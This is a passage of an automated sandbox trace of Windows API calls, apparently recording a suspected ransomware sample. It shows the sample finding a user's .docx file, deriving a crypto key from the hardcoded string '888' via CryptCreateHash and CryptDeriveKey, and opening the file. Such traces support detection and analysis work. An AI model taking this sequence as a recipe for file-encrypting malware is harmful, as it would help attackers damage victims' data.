hHeap=0x2af0000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0221.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0221.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0221.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.803] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/wrMr9 Fyz8.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa27a2b70, ftCreationTime.dwHighDateTime=0x1d55c8c, ftLastAccessTime.dwLowDateTime=0x9a3a18f0, ftLastAccessTime.dwHighDateTime=0x1d5964b, ftLastWriteTime.dwLowDateTime=0x9a3a18f0, ftLastWriteTime.dwHighDateTime=0x1d5964b, nFileSizeHigh=0x0, nFileSizeLow=0x454e, dwReserved0=0x0, dwReserved1=0x0, cFileName="wrMr9 Fyz8.docx", cAlternateFileName="WRMR9F~1.DOC")) returned 0x9e1eb8 [0221.803] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0221.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0221.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0221.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0221.805] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.805] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0221.805] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.805] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0221.806] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.807] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.807] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0221.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0221.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0221.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0221.808] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0221.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0221.808] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.808] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0221.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0221.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0221.809] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bcd0) returned 1 [0221.809] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0221.809] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0221.809] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.809] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.809] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0221.809] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0221.809] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.809] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.810] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.810] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.830] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.830] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.830] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.830] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.830] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.830] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabab8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0221.830] CryptCreateHash (in: hProv=0xa7bcd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0221.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.830] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0221.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0221.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0221.830] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.831] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabc68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0221.831] CryptHashData (hHash=0x9e1d38, pbData=0x2a71f88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0221.831] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.831] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.831] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.831] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0221.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0221.831] CryptDeriveKey (in: hProv=0xa7bcd0, Algid=0x6601, hBaseData=0x9e1d38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0221.831] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.832] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0221.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f40, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0221.832] CryptDestroyHash (hHash=0x9e1d38) returned 1 [0221.833] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/wrMr9 Fyz8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\wrmr9 fyz8.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0221.833] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.833] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0221.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0221.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0221.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0221.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 